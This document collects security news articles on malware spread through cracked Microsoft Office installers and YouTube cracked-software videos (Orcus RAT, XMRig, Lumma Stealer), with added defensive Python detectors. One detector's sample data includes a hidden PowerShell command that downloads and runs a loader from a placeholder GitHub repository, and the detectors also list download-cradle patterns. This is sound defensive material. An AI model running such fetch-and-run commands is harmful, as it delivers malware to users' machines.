
Pirated Microsoft Office Distributes a Malware Cocktail to Infiltrate Systems


Attackers are distributing a malware cocktail via cracked versions of Microsoft Office advertised on torrent websites. The malware delivered to victims includes remote access trojans (RATs), cryptocurrency miners, malware downloaders, proxy tools, and anti-AV programs.

The AhnLab Security Intelligence Centre (ASEC) has identified the ongoing campaign and warns against the risks of downloading unauthorised software. The Korean researchers found that the attackers employ a variety of lures, including Microsoft Office, Windows, and the Hangul Word Processor, which is popular in Korea.

MS Office to malware 

The cracked Microsoft Office installer has a well-designed UI that allows users to choose the version they wish to install, the language, and whether to use 32- or 64-bit versions. 

However, in the background the installer launches an obfuscated .NET malware that contacts a Telegram or Mastodon channel to obtain a valid download URL from which it downloads further components. The URL points to Google Drive or GitHub, both legitimate services that are unlikely to trigger AV warnings.

The malware component 'Updater' registers tasks in the Windows Task Scheduler so that it persists across system reboots. According to ASEC, the malware installs the following on the compromised system:

Orcus RAT: Provides extensive remote control, such as keylogging, webcam access, screen capture, and system modification for data exfiltration. 

XMRig: A cryptocurrency miner that uses the system's resources to mine Monero. It pauses mining during periods of high resource demand, such as while the victim is gaming, to avoid being noticed.

3Proxy: Turns infected systems into proxy servers by opening port 3306 and injecting itself into legitimate processes, allowing attackers to route malicious traffic through the victim.

Even if the user detects and removes any of the above malware, the 'Updater' module, which runs at system startup, will reinstall it. Users should exercise caution when installing files downloaded from suspicious sources and should avoid using pirated/cracked software.
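The persistence mechanism described above (a scheduled task that re-runs the 'Updater' at every boot) leaves a record that defenders can look for. The following is an added example, not ASEC's code: it inspects Windows Security event 4698 ("A scheduled task was created") records, whose TaskContent field carries the task XML, and flags tasks that both auto-run at boot/logon and execute a binary from a user-writable directory. The event records are constructed for illustration.

```python
"""Flag scheduled-task persistence of the kind ASEC attributes to the 'Updater'
module: a task with a boot/logon trigger whose action runs from a user-writable
directory.  Added example, not ASEC's code; the event records below are
constructed to look like Windows Security event 4698 records."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Triggers that fire without user action after a reboot or sign-in.
PERSISTENCE_TRIGGERS = {"BootTrigger", "LogonTrigger", "RegistrationTrigger"}

# Locations a standard user can write to; vendor tasks rarely run from here.
USER_WRITABLE = re.compile(
    r"(\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\"
    r"|\\Temp\\"
    r"|%(appdata|localappdata|temp|tmp|userprofile)%)",
    re.IGNORECASE,
)


def _task_xml(trigger: str, command: str) -> str:
    """Build a TaskContent document for a constructed sample event."""
    return (
        '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<Triggers><{trigger}><Enabled>true</Enabled></{trigger}></Triggers>"
        f"<Actions><Exec><Command>{command}</Command></Exec></Actions>"
        "</Task>"
    )


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "alice", "TaskName": r"\OfficeUpdater",
     "TaskContent": _task_xml("BootTrigger", r"C:\Users\alice\AppData\Roaming\Updater\updater.exe")},
    {"EventID": 4698, "SubjectUserName": "alice", "TaskName": r"\Sync",
     "TaskContent": _task_xml("LogonTrigger", r"%LOCALAPPDATA%\sync\sync.exe")},
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": _task_xml("CalendarTrigger", r"%windir%\system32\defrag.exe")},
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": r"\Vendor\AgentStart",
     "TaskContent": _task_xml("LogonTrigger", r"C:\Program Files\Vendor\agent.exe")},
]


def parse_task(task_xml: str):
    """Return (trigger names, Exec commands) from a task definition."""
    root = ET.fromstring(task_xml)
    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [] if triggers_el is None else [c.tag.rsplit("}", 1)[-1] for c in triggers_el]
    commands = [(el.text or "").strip() for el in root.findall(".//t:Exec/t:Command", TASK_NS)]
    return triggers, commands


def assess_task_event(event: dict) -> list:
    """Reasons this task-creation event looks like persistence; empty if benign."""
    if event.get("EventID") != 4698:
        return []
    triggers, commands = parse_task(event["TaskContent"])
    reasons = []
    if PERSISTENCE_TRIGGERS & set(triggers):
        reasons.append("auto-runs at boot/logon")
    if any(USER_WRITABLE.search(c) for c in commands):
        reasons.append("executable lives in a user-writable path")
    # Both together is the pattern the post describes; either alone is common
    # for legitimate tasks, so require both.
    return reasons if len(reasons) == 2 else []


def find_persistence(events) -> list:
    """Task names from `events` that match the persistence pattern."""
    return [e["TaskName"] for e in events if assess_task_event(e)]


if __name__ == "__main__":
    for name in find_persistence(SAMPLE_EVENTS):
        print("suspicious scheduled task:", name)
```

Requiring both signals keeps vendor tasks that legitimately run at logon from Program Files out of the result; a real deployment would feed this from the Security log (or Sysmon) rather than the constructed list, and would also alert when the same task name is re-created shortly after being deleted, which is exactly the 'Updater' behaviour the post warns about.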

Similar lures have been used to spread the STOP ransomware, the most active ransomware operation targeting consumers. Because these files are not digitally signed and users are willing to ignore antivirus warnings when launching them, they are frequently used to infect systems with malware, in this case an entire set.

Beware of Malicious YouTube Channels Propagating Lumma Stealer


Attackers have been propagating a Lumma Stealer variant via YouTube channels that post videos about cracking popular applications. They evade web filters by hosting the malware on publicly available platforms such as MediaFire and GitHub rather than on their own malicious servers.

The campaign, according to FortiGuard researchers, resembles an attack uncovered in March of last year that used artificial intelligence (AI) to produce step-by-step guides for installing unlicensed copies of programmes such as Photoshop, Autodesk 3ds Max, and AutoCAD.

"These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Cara Lin, Fortinet senior analyst, wrote in a blog post. 

Modus operandi 

The attack begins with an attacker compromising a YouTube account and publishing videos that pretend to offer cracked-software tips, with video descriptions carrying malicious URLs. The descriptions lure users into downloading a .ZIP file containing the malicious content.

The videos identified by Fortinet were uploaded earlier this year; however, the files on the file-sharing site are regularly updated, and the number of downloads continues to rise, suggesting that the campaign is reaching victims. "This indicates that the ZIP file is always new and that this method effectively spreads malware," Lin stated in a blog post. 

The .ZIP file contains an .LNK file that instructs PowerShell to download a .NET executable from John1323456's GitHub repository "New". The other two repositories, "LNK" and "LNK-Ex", both contain .NET loaders and use Lumma as the final payload.

"The crafted installation .ZIP file serves as an effective bait to deliver the payload, exploiting the user's intention to install the application and prompting them to click the installation file without hesitation," Lin wrote.

The .NET loader is obfuscated with SmartAssembly, a legitimate obfuscation tool. The loader then reads the system's environment values and, if their count is as expected, loads the PowerShell script; otherwise it exits.
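The first stage of the chain described above (an .LNK inside an extracted archive launching PowerShell, which fetches a loader from a code-hosting or file-sharing site, possibly behind a shortener) is visible in process-creation telemetry. The following is an added example, not Fortinet's code: it triages records shaped like Sysmon Event ID 1 fields for that pattern. The records, the EXAMPLE-USER repository path and the file names are constructed; the host list uses the platforms and shorteners the post names (GitHub, MediaFire, TinyURL, Cuttly at cutt.ly).

```python
"""Triage process-creation records for the LNK -> PowerShell -> download chain
Fortinet describes.  Added example, not Fortinet's code; the records below are
constructed to resemble Sysmon Event ID 1 fields, not captured from the campaign."""
import re

# Delivery hosts named in the post plus the shorteners it mentions.
DELIVERY_HOSTS = ("github.com", "raw.githubusercontent.com", "mediafire.com",
                  "tinyurl.com", "cutt.ly")

# PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile"
    r"|start-bitstransfer|invoke-restmethod|\birm\b)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)
# -w hidden / -WindowStyle hidden, -ep bypass / -ExecutionPolicy bypass, -nop, -noni
HIDE_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noni\b)",
    re.IGNORECASE,
)

# Constructed sample records (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {   # the lure chain: LNK in an extracted archive -> PowerShell -> GitHub
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\bob\Downloads\Photoshop_Crack",
        "CommandLine": ("powershell.exe -w hidden -ep bypass -c \"iwr "
                        "https://raw.githubusercontent.com/EXAMPLE-USER/New/main/loader.exe "
                        "-OutFile $env:TEMP\\l.exe; & $env:TEMP\\l.exe\""),
    },
    {   # an administrator running a maintenance script from a console
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CurrentDirectory": r"C:\Scripts",
        "CommandLine": r"powershell.exe -File C:\Scripts\cleanup.ps1",
    },
    {   # a user double-clicking a local script shortcut; no download involved
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\bob\Desktop",
        "CommandLine": r"powershell.exe -File C:\Users\bob\Desktop\notes.ps1",
    },
]


def _is_delivery_host(host: str) -> bool:
    """Exact or subdomain match against DELIVERY_HOSTS (no suffix tricks)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in DELIVERY_HOSTS)


def assess_process(event: dict) -> list:
    """Reasons this record matches the LNK -> PowerShell -> download pattern."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    cwd = event.get("CurrentDirectory", "").lower()
    reasons = []
    if parent.endswith("explorer.exe"):
        reasons.append("started from Explorer (double-clicked file or .LNK)")
    if "\\downloads\\" in cwd or "\\temp\\" in cwd:
        reasons.append("working directory is Downloads/Temp (extracted archive)")
    if DOWNLOAD_CRADLE.search(cmd) and any(_is_delivery_host(h) for h in URL_RE.findall(cmd)):
        reasons.append("downloads from code-hosting/file-sharing/shortener host")
    if HIDE_FLAGS.search(cmd):
        reasons.append("hidden window / policy bypass flags")
    return reasons


def is_suspicious(event: dict) -> bool:
    """The download from a delivery host is the key signal; require it plus one more."""
    reasons = assess_process(event)
    return any(r.startswith("downloads") for r in reasons) and len(reasons) >= 2


def triage(events) -> list:
    """Indices of records in `events` that should be escalated."""
    return [i for i, e in enumerate(events) if is_suspicious(e)]


if __name__ == "__main__":
    for i in triage(SAMPLE_PROCESS_EVENTS):
        print(f"record {i}:", "; ".join(assess_process(SAMPLE_PROCESS_EVENTS[i])))
```

The download-cradle match on its own would also catch administrators who legitimately fetch scripts from GitHub, which is why the rule requires a second signal such as the Explorer parent (the LNK double-click) or the Downloads working directory; on a fleet where PowerShell from Explorer is itself unusual, that alone may be worth a lower-severity alert.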

YouTube malware evasion and caution

The malware is designed to evade detection. A ProcessStartInfo object starts the PowerShell process, which eventually loads a DLL for the next stage of the attack; that DLL examines the environment in several ways to avoid detection, checking for debuggers, security appliances or sandboxes, virtual machines, and other services or files that could impede a malicious process.

"After completing all environment checks, the program decrypts the resource data and invokes the 'SuspendThread' function," Lin added. "This function is employed to transition the thread into a 'suspended' state, a crucial step in the process of payload injection."

Once launched, Lumma contacts the command-and-control (C2) server and establishes a connection over which it sends compressed stolen data back to the attackers. Lin observed that the variant used in the campaign is version 4.0, but its exfiltration has been upgraded to use HTTPS to better evade detection.

Infections are, however, detectable. In its publication, Fortinet provided users with a list of indicators of compromise (IoCs) and cautionary advice regarding "unclear application sources." According to Fortinet, users should make sure that any applications they download from YouTube or any other platform come from reliable and safe sources.

Think Twice Before Using Pirated Software


Almost everyone has at some point dabbled in pirated software. Free software appeals to a wide range of users, most of whom are unaware of the risks involved, and as software prices rise more people choose to install unauthorised or pirated copies. We'll go over the dangers that using unauthorised copies can cause.

Your computer becoming infected is the first threat you face. The crack itself may well be malware. Some of you may think an antivirus alert on a crack is just a false positive; that is not generally true. Malware's effects are well known: it slows down your computer, sends out your personal information, downloads further malware, corrupts your data, and so on. The stolen information can include passwords, address books, and credit card and bank account details, all of which can be used immediately by identity thieves.

In this article, we will explain why downloading such illegitimate software is risky. 

What Exactly Is Software Piracy? 

Software that has been illegally copied, distributed, or used is referred to as pirated software. Software piracy covers a range of actions; the basic example is a person who makes several copies of a programme and sells them. It is usually criminalised under copyright law because it violates the developer's copyright.

Software cracking methods

Crackers employ a variety of techniques to circumvent licence keys and software security protections.

Keygen cracking 

Keygen cracking is the use of a key-generating application to produce licence keys the software accepts as legitimate. Such a program, known as a "keygen", reproduces the algorithm the underlying application uses to generate genuine licence keys for paying customers. Crackers use keygens to bypass software activation and gain access to premium features that are only available to paying customers. The keygen is typically supplied along with the cracked version of the software so that it can be activated on numerous computers.

Cracking a patch 

With this technique, crackers examine the software's code and produce a programme (a "patch") that alters it. First, they analyse the code to locate the routines that enforce its security measures. They then modify the code to remove those protections entirely. After the modification, they create the patch, a small programme that applies the same changes to the software when run. The patch is distributed with the cracked software, making it possible to use it on numerous copies of the same programme without paying for a licence.

Server-based cracking 

In server-based cracking, the software's security features are bypassed by setting up a collection of servers from which the cracked software can be downloaded. The servers are configured to circumvent the protections put in place by the software's developers. Crackers achieve this either by directly altering the software's code or by building on an already cracked version, and by using a key generator to produce licence keys for it. Once this is done, the crackers typically publish a download link on a website so users can obtain the cracked software.
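Both the patching technique just described and the unsigned files mentioned in the first post above have a consequence a user can check for before running a downloaded installer: a patched or repackaged binary no longer matches the hash the vendor publishes, and cracked builds generally carry no embedded Authenticode signature at all. The following is an added example, not from this post: it compares a file's SHA-256 against a published value and parses the PE headers to see whether the image even has an Attribute Certificate Table (the container for an Authenticode signature). The PE images are constructed minimal headers, and presence of the table only shows that a signature is attached; whether it is valid must be checked with the operating system or signtool.

```python
"""Two pre-execution checks for a downloaded installer: published-hash match
and presence of a PE certificate table.  Added example, not from the post;
the PE images below are constructed minimal headers, not real installers."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data directory index of the certificate table
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def certificate_table(pe: bytes):
    """Return (file offset, size) of the certificate table, or None if absent."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20                       # skip signature + COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        nrva_off, dirs_off = 92, 96               # NumberOfRvaAndSizes, DataDirectory
    elif magic == PE32PLUS_MAGIC:
        nrva_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    n_dirs = struct.unpack_from("<I", pe, opt + nrva_off)[0]
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    entry = opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    offset, size = struct.unpack_from("<II", pe, entry)
    # Unlike other directories, this entry holds a raw file offset, not an RVA.
    if offset == 0 or size == 0 or offset + size > len(pe):
        return None
    return offset, size


def verify_download(data: bytes, published_sha256: str) -> dict:
    """Hash comparison plus signature-container presence."""
    actual = hashlib.sha256(data).hexdigest()
    return {
        "sha256": actual,
        "hash_matches": actual.lower() == published_sha256.lower(),
        "has_certificate_table": certificate_table(data) is not None,
    }


def build_sample_pe(cert_size: int) -> bytes:
    """Constructed minimal PE32+ image: DOS header, COFF header, optional header,
    then `cert_size` bytes standing in for a certificate table (0 = unsigned)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 108, 16)                      # NumberOfRvaAndSizes
    table_off = len(dos) + len(coff) + len(opt)
    if cert_size:
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         table_off, cert_size)
    return bytes(dos) + coff + bytes(opt) + b"\0" * cert_size


SIGNED_SAMPLE = build_sample_pe(512)       # carries a certificate table
UNSIGNED_SAMPLE = build_sample_pe(0)       # cracked-style build: no table
VENDOR_SHA256 = hashlib.sha256(SIGNED_SAMPLE).hexdigest()   # stands in for the published hash

if __name__ == "__main__":
    tampered = SIGNED_SAMPLE[:-1] + b"\x01"   # one byte altered, as a patch would do
    for label, blob in (("vendor build", SIGNED_SAMPLE), ("patched", tampered),
                        ("unsigned", UNSIGNED_SAMPLE)):
        print(label, verify_download(blob, VENDOR_SHA256))
```

On a real download, `VENDOR_SHA256` would be the value taken from the vendor's website (over HTTPS, not from the same page that served the file), and a `has_certificate_table` of True should be followed by an actual signature check, since an attacker can attach any certificate they like; an absent table, by contrast, is a reliable sign that the file is not the signed vendor build.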

Why Should You Stop Using Pirated Software? 

It makes you more exposed to attack. Research shows that 34% of unlicensed software downloaded through P2P was infected with malware, which infects the machine once it is run; of that group, Trojans made up almost half. Installing illegal software opens the door to malware. Your computer and the data it stores could be destroyed by ransomware, viruses, Trojan horses, and other malicious software. Some pirated software packages contain malware that can access your data and take control of your device and webcam. Using illegally obtained software also puts you at risk of being used in a denial-of-service attack.

The following are some of the risks you may encounter: 

Incompatibility: You might find that the pirated software isn't compatible with your device, meaning it won't work when you need it most, because it is a modified copy of the original. Even when such tools appear to work, their results may not be accurate. Because some businesses check the registration of their software, the application may function for a time before failing.

Legal concerns: Anything that has an original will almost certainly be faked. When someone takes your work, claims ownership of it, and then markets it, that is unfair, and businesses naturally want to protect their assets. Using counterfeit software breaks the licence terms and violates the developer's copyright, which is why it is not a good idea.

Product upgrades are not possible: As new patches or updates are released, you can improve your experience with a legitimate programme by updating it. This is not possible with a pirated version, so you are stuck with its limitations. Attempting to upgrade a pirated copy to the original package may also result in penalties. There is simply no way to upgrade the product.